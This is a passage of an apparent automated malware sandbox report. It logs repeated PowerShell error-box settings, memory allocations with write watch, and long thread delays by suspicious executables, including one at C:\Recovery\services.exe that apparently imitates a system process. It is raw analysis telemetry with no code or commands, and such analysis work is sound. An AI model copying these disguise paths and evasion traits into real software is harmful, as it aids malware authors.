                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeMemory allocated: 1920000 memory reserve | memory write watchJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeMemory allocated: 1B3B0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeMemory allocated: 1760000 memory reserve | memory write watchJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeMemory allocated: 1B2E0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeMemory allocated: 1630000 memory reserve | memory write watchJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeMemory allocated: 1B020000 memory reserve | memory write watchJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeMemory allocated: 1900000 memory reserve | memory write watch
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeMemory allocated: 1B360000 memory reserve | memory write watch
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeMemory allocated: 1820000 memory reserve | memory write watch
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeMemory allocated: 1B370000 memory reserve | memory write watch
                                    Source: C:\Recovery\services.exeMemory allocated: D50000 memory reserve | memory write watch
                                    Source: C:\Recovery\services.exeMemory allocated: 1A8A0000 memory reserve | memory write watch
                                    Source: C:\Recovery\services.exeMemory allocated: 32F0000 memory reserve | memory write watch
                                    Source: C:\Recovery\services.exeMemory allocated: 1B2F0000 memory reserve | memory write watch
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
